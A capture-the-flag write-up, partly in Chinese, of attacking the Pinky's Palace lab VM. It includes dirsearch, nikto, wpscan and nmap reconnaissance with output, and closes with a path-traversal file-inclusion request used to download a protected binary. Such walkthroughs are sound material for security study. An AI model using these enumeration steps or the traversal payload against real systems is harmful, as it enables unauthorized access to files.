dirsearch -u 192.168.240.133 dirb http://192.168.240.133/ nikto -host 192.168.240.134 -p 80 wpscan --url http://192.168.240.134 --enumerate u //枚举用户
1 2 3 4 5 6 7 8 9 10 11
└─# nmap --min-rate 100000 -p- 192.168.240.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-0118:20 CST Nmap scan report for192.168.240.134 Host is up (0.0059s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 4655/tcp openunknown 7654/tcp openunknown 31337/tcp open Elite MAC Address: 00:0C:29:2E:ED:51 (VMware)
80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Pinky's Blog – Just another WordPress site |_http-generator: WordPress 4.9.4 4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0) | ssh-hostkey: | 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA) | 2563a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA) |_256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519) 7654/tcp open http nginx 1.10.3 |_http-server-header: nginx/1.10.3 |_http-title: 403 Forbidden 31337/tcp open Elite? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | GetRequest: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | HTTP/1.0 | HTTPOptions: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | OPTIONS / HTTP/1.0 | Help: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | HELP | RTSPRequest: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | OPTIONS / RTSP/1.0 | SIPOptions: | [+] Welcome to The Daemon [+] | This is soon to be our backdoor | into Pinky's Palace. | OPTIONS sip:nm SIP/2.0 | Via: SIP/2.0/TCP nm;branch=foo | From: <sip:nm@nm>;tag=root | <sip:nm2@nm2> | Call-ID: 50000 | CSeq: 42 OPTIONS | Max-Forwards: 70 | Content-Length: 0 | Contact: <sip:nm@nm> |_ Accept: application/sdp MAC Address: 00:0C:29:2E:ED:51 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─# nikto -host 192.168.240.134 -p 80 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.240.134 + Target Hostname: 192.168.240.134 + Target Port: 80 + StartTime: 2024-12-0118:36:12 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.25 (Debian) + /: The anti-clickjacking X-Frame-Optionsheaderisnot present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: Drupal Link headerfoundwithvalue: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/ + /: The X-Content-Type-Optionsheaderisnotset. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all'to force checkall possible dirs) + Apache/2.4.25 appears to be outdated (currentis at least Apache/2.4.54). Apache 2.2.34is the EOL for the 2.x branch. + /: Web Serverreturns a valid response with junk HTTP methods which may cause false positives. + /: DEBUG HTTP verb may showserver debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 + /secret/: Directory indexing found. # 这里有个字典,8890、7000、666、pinkydb + /secret/: This might be interesting. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to'version usually matches the WordPress version. + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to'version usually matches the WordPress version. + /wp-links-opml.php: This WordPress script reveals the installed version. + /license.txt: License file found may identify site software. + /: A Wordpress installation was found. + /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + /wp-login.php: Wordpress loginfound. + 8103 requests: 0 error(s) and16 item(s) reported on remote host + EndTime: 2024-12-0118:36:26 (GMT8) (14 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
在tools下发现qusb文件,Pinky made me this program so I can easily send messages to him.意思是说用这个程序给pinky发消息,cat一下发现没有权限 python3 -m http.server开个端口把这个文件下载一下,,,不让我下载 又做了好久的信息收集找到了文件包含这里,试试能不能包含qusb http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub wget http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub下载成功